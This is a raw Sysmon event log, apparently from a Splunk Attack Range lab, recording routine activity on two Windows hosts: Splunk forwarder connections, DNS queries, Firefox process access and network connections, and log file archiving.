09:16:16.793{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53431-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:16.609{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54235- 23542300x80000000000000001051085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:19.200{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56A24EE4AF52E1668033EF6C7B4B8E0B,SHA256=D6B3AD0B582702B16CB2B54BF984F16EE48C5788FF6E01525A71F62D4B4D61B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.215{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF0466F299A04B397D0673FE2F299005,SHA256=37E26CF95BCCC14B664F3872D68286BB0E0D7F2D86F4DAA0F970D2DE0C8096D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:20.174{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E6FB933BE8AA3E149B930EC27BB712,SHA256=990AC67886F4FB2AE294FED54132651A2951A2FB51C52927770F6EFD3E82FBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.288{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.288{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.288{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B827A39FA265D45479AA3FFC7B942DA,SHA256=D7A0790D8C92C42C3164B55DA9F51917FEF5BD3A6E27110ECF33E667D1D4D751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:21.190{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E293A95C183052CCA8AA728755513E,SHA256=FC7061A3B716153EAB0A8099F8E546DC6D383A98E6353237A185E7EC01E9DAF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.151{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.084{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:21.084{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000979708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:17.721{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59438-false10.0.1.12-8000- 23542300x80000000000000001051112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.316{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15E228B500EB1B5C85A62897510BB3B4,SHA256=667011891450B9808262561D5FC8F77729FFC64FB8E6BE3A7C2334077B031483,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.799{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local64462-false142.250.184.238fra24s12-in-f14.1e100.net443https 354300x80000000000000001051110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.796{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57371- 354300x80000000000000001051109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.762{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53433-false104.18.9.111-443https 354300x80000000000000001051108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.756{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53964- 23542300x8000000000000000979710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:22.190{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBCC966A7EF135B029FD877BFD7950EE,SHA256=D648BB4828B2F10DAC48D8542550349FE22EA0710C6BC411AB60F317140DC88C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.184{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+c069c8|C:\Program Files\Mozilla Firefox\xul.dll+c06d2d 10341000x80000000000000001051106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.184{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.184{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c04bf0|C:\Program Files\Mozilla Firefox\xul.dll+27c138b|C:\Program Files\Mozilla Firefox\xul.dll+27b4476|C:\Program Files\Mozilla Firefox\xul.dll+bfe10a|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32 10341000x80000000000000001051104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.184{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+c02a70|C:\Program Files\Mozilla Firefox\xul.dll+c031cb|C:\Program Files\Mozilla Firefox\xul.dll+396c71|C:\Program Files\Mozilla Firefox\xul.dll+c03f99|C:\Program Files\Mozilla Firefox\xul.dll+c06f52|C:\Program Files\Mozilla Firefox\xul.dll+c039b6|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+c069c8|C:\Program Files\Mozilla Firefox\xul.dll+c06d2d 10341000x80000000000000001051103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.182{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.165{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.165{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.165{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.164{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:22.164{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.704{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53432-false104.18.8.111-443https 354300x80000000000000001051096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.701{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56477- 354300x80000000000000001051095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:20.694{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50760- 23542300x80000000000000001051119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:23.401{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9677EC9911381D7BC09ADC81A1583FD,SHA256=205DD66DE0C5D07519CD871A6A95B936C3F304414561043C2EBCE529CFEEDD0A,IMPHASH=00000000000000000000000000000000falsetrue 